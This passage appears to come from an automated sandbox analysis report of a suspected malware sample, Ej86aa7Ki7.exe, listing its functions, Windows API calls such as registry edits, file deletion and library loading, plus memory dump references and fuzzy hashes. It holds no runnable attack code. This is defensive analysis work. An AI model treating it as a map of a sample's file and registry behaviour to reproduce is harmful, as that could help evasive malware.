        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Enum$CloseOpenValue
        • String ID:
        • API String ID: 167947723-0
        • Opcode ID: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
        • Instruction ID: bf3b2bcb6287721b49d379c1e5eb9bed13c1d22dc32754f1d9800637ac4e69b6
        • Opcode Fuzzy Hash: d2a030f519bef57aeb41d3aabfee9c269b42944cadf78794d8793362519e5dac
        • Instruction Fuzzy Hash: 44018F71A04204ABE7109FA59E8CABF766CEF40388F10443EF506A61D0EAF84E419629
        Function 004060DF Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,004281E0,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 00406109
        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040612A
        • RegCloseKey.ADVAPI32(?,?,00406352,80000002,Software\Microsoft\Windows\CurrentVersion,?,004281E0,?), ref: 0040614D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseOpenQueryValue
        • String ID:
        • API String ID: 3677997916-0
        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
        • Instruction ID: 5a49725d9b8b462efd799bce316dcbaad7059079bb26d9a6c1e38be835131f9e
        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
        • Instruction Fuzzy Hash: 2F015A3110020AEACF218F26ED08EDB3BA9EF88391F01403AFD55D6220D774D964CBA5
        Function 004059BB Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00405DC2: GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
          • Part of subcall function 00405DC2: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405B9D), ref: 004059D6
        • DeleteFileW.KERNEL32(?,?,?,00000000,00405B9D), ref: 004059DE
        • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059F6
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$Attributes$DeleteDirectoryRemove
        • String ID:
        • API String ID: 1655745494-0
        • Opcode ID: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
        • Instruction ID: bc22120fb0abf4725c7bfcc2d312b2669146bcdc80e6b93b711a22507a8c90f5
        • Opcode Fuzzy Hash: 4d7e10e481d95c5c5c7c05f6c7e2fdde8e74fc3924f4c20308c7a9621a850695
        • Instruction Fuzzy Hash: 29E06572219A9196C2106735590CB5F2998DF86734F054A3BF591B11D0DB7888068A7D
        Function 0040317B Relevance: 3.1, APIs: 2, Instructions: 88COMMON
        Download Yara Rule
        APIs
        • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004031A0
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FilePointer
        • String ID:
        • API String ID: 973152223-0
        • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
        • Instruction ID: 40ace49db037ace229a3e5c96781d28ed7fa856bf3440834985399bb1b02b3fc
        • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
        • Instruction Fuzzy Hash: 65316B30601219EBDF10DFA5ED84ADA3E68FF04799F20417EF905E6190D7788E509BA9
        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
        Download Yara Rule
        APIs
        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
        • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
        • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
        • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
        Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00402D5D: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AD
        • RegCloseKey.ADVAPI32(00000000), ref: 004023B6
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CloseDeleteOpenValue
        • String ID:
        • API String ID: 849931509-0
        • Opcode ID: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
        • Instruction ID: c0d23e370c25ffca0c370365ac79ff448217ed3cb42859f8984a45efd79f81dd
        • Opcode Fuzzy Hash: e6a42a97a56624194c1f16ef160d96f75f01f2dbcd79b4c5bc821ba537a64a6e
        • Instruction Fuzzy Hash: A8F0C233A04111ABEB10BBB49B8EAAE72699F40348F11447FF602B71C0C9FC4D428669
        Function 00405444 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
        Download Yara Rule
        APIs
        • OleInitialize.OLE32(00000000), ref: 00405454
          • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
        • CoUninitialize.COMBASE(00000404,00000000), ref: 004054A0
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: InitializeMessageSendUninitialize
        • String ID:
        • API String ID: 2896919175-0
        • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
        • Instruction ID: 97e24603e1a40a48e39ce2db5dd5886101c9f28e99c3f4bcfc8565b2c6c37521
        • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
        • Instruction Fuzzy Hash: 3DF0F076600601CBD31057549E02BAB72A4EFC0306F46407EEE44A23B1D67A48928A6E
        Function 004065EC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
        Download Yara Rule
        APIs
        • GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
        • GetProcAddress.KERNEL32(00000000,?), ref: 00406619
          • Part of subcall function 0040657C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
          • Part of subcall function 0040657C: wsprintfW.USER32 ref: 004065CE
          • Part of subcall function 0040657C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
        • String ID:
        • API String ID: 2547128583-0
        • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
        • Instruction ID: aacf951b1eba8b902ff867273acd7254ef5911eae3d9513ed99e50af610fe84a
        • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
        • Instruction Fuzzy Hash: 44E026326046206BC31047705E0893762AC9FC83003020C3EF502F2044CB789C329EAD
        Function 00405DE7 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
        Download Yara Rule
        APIs
        • GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405DEB
        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: File$AttributesCreate
        • String ID:
        • API String ID: 415043291-0
        • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
        • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
        • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
        • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
        Function 00405DC2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
        Download Yara Rule
        APIs
        • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
        • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
        • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
        • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
        Function 004058BD Relevance: 3.0, APIs: 2, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
        • GetLastError.KERNEL32 ref: 004058D1
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CreateDirectoryErrorLast
        • String ID:
        • API String ID: 1375471231-0
        • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
        • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
        • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
        • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
        Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
        Download Yara Rule
        APIs
        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: PrivateProfileStringWrite
        • String ID:
        • API String ID: 390214022-0
        • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
        • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
        • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
        • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
        Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Open
        • String ID:
        • API String ID: 71445658-0
        • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
        • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
        • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
        • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
        Function 00405E6A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
        Download Yara Rule
        APIs
        • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
